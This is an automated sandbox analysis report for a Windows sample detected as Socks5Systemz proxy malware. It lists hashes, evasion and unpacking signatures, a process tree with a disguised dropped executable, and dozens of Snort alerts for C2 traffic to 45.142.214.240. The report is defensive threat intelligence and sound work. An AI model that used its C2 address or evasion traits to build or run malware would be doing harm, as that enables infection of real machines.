
Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1417474
MD5:f306ea1faa91611b7bc26e9cc0bd3956
SHA1:accc3aa32f33273b46765d024c0cb16cc8463486
SHA256:ff66d8e75eccb014fd09adc9045bd1630219def9a7635d4a9ac382466eb7f435
Tags:exe

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Socks5Systemz
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6300 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F306EA1FAA91611B7BC26E9CC0BD3956)
    • file.tmp (PID: 5004 cmdline: "C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp" /SL5="$20446,1681617,54272,C:\Users\user\Desktop\file.exe" MD5: 8E02BC0DF97F95A1DF3FD1EEE341C73F)
      • metatoggermusiccollection.exe (PID: 5888 cmdline: "C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -i MD5: CC6DE23FFDBD2BC10F9CFD9E44659A2D)
      • metatoggermusiccollection.exe (PID: 6408 cmdline: "C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -s MD5: CC6DE23FFDBD2BC10F9CFD9E44659A2D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.3216353053.00000000025B9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
Process Memory Space: metatoggermusiccollection.exe PID: 6408 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
        No Sigma rule has matched
        Timestamp:03/29/24-12:09:45.420994
        SID:2049467
        Source Port:49712
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:33.201024
        SID:2049467
        Source Port:49773
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:31.266790
        SID:2049467
        Source Port:49770
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:50.438859
        SID:2049467
        Source Port:49718
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:29.343836
        SID:2049467
        Source Port:49767
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:25.092185
        SID:2049467
        Source Port:49761
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:35.156161
        SID:2049467
        Source Port:49776
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:45.795139
        SID:2049467
        Source Port:49788
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:42.173450
        SID:2049467
        Source Port:49785
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:52.762235
        SID:2049467
        Source Port:49721
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:37.498093
        SID:2049467
        Source Port:49779
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:49.656205
        SID:2049467
        Source Port:49794
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:10.485514
        SID:2049467
        Source Port:49746
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:16.841602
        SID:2049467
        Source Port:49752
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:47.724356
        SID:2049467
        Source Port:49791
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:39.408449
        SID:2049467
        Source Port:49782
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:21.519109
        SID:2049467
        Source Port:49758
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:19.594654
        SID:2049467
        Source Port:49755
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:14.920798
        SID:2049467
        Source Port:49749
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:27.424287
        SID:2049467
        Source Port:49764
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:58.919317
        SID:2049467
        Source Port:49728
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:20.874262
        SID:2049467
        Source Port:49757
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:43.222189
        SID:2049467
        Source Port:49786
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:38.127296
        SID:2049467
        Source Port:49780
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:53.388422
        SID:2049467
        Source Port:49722
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:26.780979
        SID:2049467
        Source Port:49763
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:53.501609
        SID:2049467
        Source Port:49800
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:30.625360
        SID:2049467
        Source Port:49769
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:52.218008
        SID:2049467
        Source Port:49798
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:49.624355
        SID:2049467
        Source Port:49716
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:07.520008
        SID:2049467
        Source Port:49740
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:34.518099
        SID:2049467
        Source Port:49775
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:03.645340
        SID:2049467
        Source Port:49734
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:26.142227
        SID:2049467
        Source Port:49762
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:02.989420
        SID:2049467
        Source Port:49733
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:29.982779
        SID:2049467
        Source Port:49768
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:51.565445
        SID:2049467
        Source Port:49797
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:06.876572
        SID:2049467
        Source Port:49739
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:33.860666
        SID:2049467
        Source Port:49774
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:58.280004
        SID:2049467
        Source Port:49727
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:16.200826
        SID:2049467
        Source Port:49751
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:48.356929
        SID:2049467
        Source Port:49792
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:08.153311
        SID:2049467
        Source Port:49741
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:09.844842
        SID:2049467
        Source Port:49744
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:04.284502
        SID:2049467
        Source Port:49735
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:52.864072
        SID:2049467
        Source Port:49799
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:49.012408
        SID:2049467
        Source Port:49793
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:17.904399
        SID:2049467
        Source Port:49753
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:59.565419
        SID:2049467
        Source Port:49729
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:20.232000
        SID:2049467
        Source Port:49756
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:06.232200
        SID:2049467
        Source Port:49738
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:11.167852
        SID:2049467
        Source Port:49747
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:38.765184
        SID:2049467
        Source Port:49781
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:47.079531
        SID:2049467
        Source Port:49790
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:52.123640
        SID:2049467
        Source Port:49720
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:41.536693
        SID:2049467
        Source Port:49784
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:43.860067
        SID:2049467
        Source Port:49787
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:57.218726
        SID:2049467
        Source Port:49726
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:36.862357
        SID:2049467
        Source Port:49778
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:15.568464
        SID:2049467
        Source Port:49750
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:54.451755
        SID:2049467
        Source Port:49723
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:02.326674
        SID:2049467
        Source Port:49732
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:50.920566
        SID:2049467
        Source Port:49796
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:55.746985
        SID:2049467
        Source Port:49725
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:18.951435
        SID:2049467
        Source Port:49754
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:46.435554
        SID:2049467
        Source Port:49789
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:40.888750
        SID:2049467
        Source Port:49783
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:01.265583
        SID:2049467
        Source Port:49731
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:50.283368
        SID:2049467
        Source Port:49795
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:05.594232
        SID:2049467
        Source Port:49737
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:51.076317
        SID:2049467
        Source Port:49719
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:13.452004
        SID:2049467
        Source Port:49748
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:31.920222
        SID:2049467
        Source Port:49771
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:28.703817
        SID:2049467
        Source Port:49766
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:00.203383
        SID:2049467
        Source Port:49730
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:32.566269
        SID:2049467
        Source Port:49772
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:55.106879
        SID:2049467
        Source Port:49724
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:28.062365
        SID:2049467
        Source Port:49765
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:48.936277
        SID:2049467
        Source Port:49713
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:36.217358
        SID:2049467
        Source Port:49777
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:22.983300
        SID:2049467
        Source Port:49759
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:09.201668
        SID:2049467
        Source Port:49742
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:23.628743
        SID:2049467
        Source Port:49760
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:04.939736
        SID:2049467
        Source Port:49736
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        AV Detection

Source: file.exe | Avira: detected
Source: http://45.142.214.240/ | Virustotal: Detection: 7%
Source: file.exe | Virustotal: Detection: 8%
Source: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_0045B4AC GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045B4AC
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_0045B560 ArcFourCrypt,1_2_0045B560
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_0045B578 ArcFourCrypt,1_2_0045B578
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_10001130 ArcFourCrypt,1_2_10001130

        Compliance

Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Unpacked PE file: 3.2.metatoggermusiccollection.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Unpacked PE file: 4.2.metatoggermusiccollection.exe.400000.0.unpack
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_0047A44C FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_0047A44C
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_0047077C FindFirstFileA,FindNextFileA,FindClose,1_2_0047077C
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_004513E4 FindFirstFileA,GetLastError,1_2_004513E4
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_004601DC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_004601DC
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_00478334 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_00478334
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_00460658 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00460658
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_0045EC50 FindFirstFileA,FindNextFileA,FindClose,1_2_0045EC50
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_00491EBC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00491EBC
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File opened: C:\Users\user\AppData

        Networking

Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49712 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49713 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49716 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49718 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49719 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49720 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49721 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49722 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49723 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49724 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49725 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49726 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49727 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49728 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49729 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49730 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49731 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49732 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49733 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49734 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49735 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49736 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49737 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49738 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49739 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49740 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49741 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49742 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49744 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49746 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49747 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49748 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49749 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49750 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49751 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49752 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49753 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49754 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49755 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49756 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49757 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49758 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49759 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49760 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49761 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49762 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49763 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49764 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49765 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49766 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49767 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49768 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49769 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49770 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49771 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49772 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49773 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49774 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49775 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49776 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49777 -> 45.142.214.240:80
